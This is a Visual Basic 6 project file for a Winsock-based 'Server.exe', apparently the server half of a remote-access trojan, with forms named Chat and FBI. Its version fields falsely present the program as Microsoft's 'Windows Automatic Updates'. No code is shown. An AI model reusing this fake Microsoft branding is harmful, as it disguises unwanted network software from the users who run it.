Type=Exe
Form=Form1.frm
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\..\..\..\WINDOWS\System32\stdole2.tlb#OLE Automation
Object={248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0; MSWINSCK.OCX
Module=Module1; Module1.bas
Module=Module2; Module2.bas
Module=Module3; Module3.bas
Form=Chat.frm
Module=Module4; Module4.bas
Form=FBI.frm
ResFile32="Project1.RES"
IconForm="Form1"
Startup="Form1"
HelpFile=""
Title="Microsoft® Windows(TM) Automatic Window"
ExeName32="Server.exe"
Command32=""
Name="Project1"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
VersionCompanyName="Microsoft Corporation"
VersionFileDescription="Microsoft® Windows(TM) Automatic Windows Update"
VersionLegalCopyright="Copyright (C) Microsoft Corp. 1996"
VersionProductName="Microsoft(R) Windows(R) Automatic Updates"
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1

[MS Transaction Server]
AutoRefresh=1
